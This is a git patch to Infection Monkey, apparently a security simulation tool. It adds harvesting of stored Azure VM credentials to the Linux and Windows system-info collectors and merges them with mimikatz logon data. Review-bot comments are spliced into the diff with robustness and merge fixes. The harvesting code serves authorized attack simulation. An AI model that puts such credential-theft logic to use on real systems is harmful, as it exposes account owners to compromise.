From e3bd29ef6f28b740e54a45dd1b9c99d379d1a72e Mon Sep 17 00:00:00 2001
From: Daniel Goldberg
Date: Thu, 22 Mar 2018 16:44:56 +0200
Subject: [PATCH] Add credential harvesting by default to both OS colelctors
---
 infection_monkey/system_info/__init__.py | 21 +++++++++++++++++++
 .../system_info/linux_info_collector.py | 1 +
 .../system_info/windows_info_collector.py | 4 +++-
 3 files changed, 25 insertions(+), 1 deletion(-)
diff --git a/infection_monkey/system_info/__init__.py b/infection_monkey/system_info/__init__.py
index 126854b8e..464b1462c 100644
--- a/infection_monkey/system_info/__init__.py
+++ b/infection_monkey/system_info/__init__.py
@@ -7,6 +7,8 @@ from enum import IntEnum from network.info import get_host_subnets +from azure_cred_collector import AzureCollector + LOG = logging.getLogger(__name__) # Linux doesn't have WindowsError
@@ -104,3 +106,22 @@ class InfoCollector(object):
         """
         LOG.debug("Reading subnets")
         self.info['network_info'] = {'networks': get_host_subnets()}
+
+    def get_azure_info(self):
+        """
+        Adds credentials possibly stolen from an Azure VM instance (if we're on one)
+        Updates the credentials structure, creating it if neccesary (compat with mimikatz)
+        :return: None. Updates class information
+        """
+        LOG.debug("Harvesting creds if on an Azure machine")
+        azure_collector = AzureCollector()
+        if 'credentials' not in self.info:
+            self.info["credentials"] = {}
+        for cred in azure_collector.extract_stored_credentials():
+            username = cred[0]
+            password = cred[1]
+            if username not in self.info["credentials"]:
+                self.info["credentials"][username] = {}
+            # we might be losing passwords in case of multiple reset attempts on same username
+            # or in case another collector already filled in a password for this user
+            self.info["credentials"][username]['Password'] = password
diff --git a/infection_monkey/system_info/linux_info_collector.py b/infection_monkey/system_info/linux_info_collector.py
index 906173421..ccdd7cb30 100644
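Review bot: `get_azure_info` lets any exception from `AzureCollector()` or `extract_stored_credentials()` propagate, and because both OS collectors now call it unconditionally before `return self.info`, a failure on a non-Azure host or a transient error while reading instance data would abort the entire system-info report instead of just the Azure part. Unless `AzureCollector` already guarantees it never raises (not visible in this patch), this best-effort collector should catch at its own boundary, log with `LOG.exception`, and return with the credentials structure left as it was. As smaller style points, `self.info.setdefault("credentials", {})` replaces the membership test, `username, password = cred` reads better than `cred[0]`/`cred[1]` if each entry is a pair, and the docstring has a typo (`neccesary` → `necessary`). The per-user merge loop itself can stay as written.
```python
        self.info.setdefault("credentials", {})
        try:
            stored = AzureCollector().extract_stored_credentials()
        except Exception:
            # best-effort collector: log and keep the rest of the report intact
            LOG.exception("Azure credential collection failed")
            return
        for cred in stored:
            # … unchanged: per-user merge into self.info["credentials"] …
```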
--- a/infection_monkey/system_info/linux_info_collector.py
+++ b/infection_monkey/system_info/linux_info_collector.py
@@ -25,4 +25,5 @@ class LinuxInfoCollector(InfoCollector):
         self.get_hostname()
         self.get_process_list()
         self.get_network_info()
+        self.get_azure_info()
         return self.info
diff --git a/infection_monkey/system_info/windows_info_collector.py b/infection_monkey/system_info/windows_info_collector.py
index 72e189f81..610c4e8e3 100644
--- a/infection_monkey/system_info/windows_info_collector.py
+++ b/infection_monkey/system_info/windows_info_collector.py
@@ -27,6 +27,8 @@ class WindowsInfoCollector(InfoCollector):
         self.get_hostname()
         self.get_process_list()
         self.get_network_info()
+        self.get_azure_info()
         mimikatz_collector = MimikatzCollector()
-        self.info["credentials"] = mimikatz_collector.get_logon_info()
+        mimikatz_info = mimikatz_collector.get_logon_info()
+        self.info["credentials"].update(mimikatz_info)
         return self.info
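Review bot: `self.info["credentials"].update(mimikatz_info)` in the Windows collector is a shallow merge, so a username reported by both the Azure collector (which has just written `{username: {'Password': ...}}`) and mimikatz has its whole per-user dict replaced by mimikatz's entry, and the Azure-harvested `'Password'` is lost unless mimikatz also supplied one. Merging one level deeper keeps both sources: `for user, creds in mimikatz_collector.get_logon_info().items():` followed by `self.info["credentials"].setdefault(user, {}).update(creds)`. The new line also relies on `get_azure_info()` having created `self.info["credentials"]` (it does) and on `get_logon_info()` returning a dict, whereas the replaced assignment tolerated any return value; if mimikatz can return `None` on failure, that needs a guard. The enclosing method starts before this hunk.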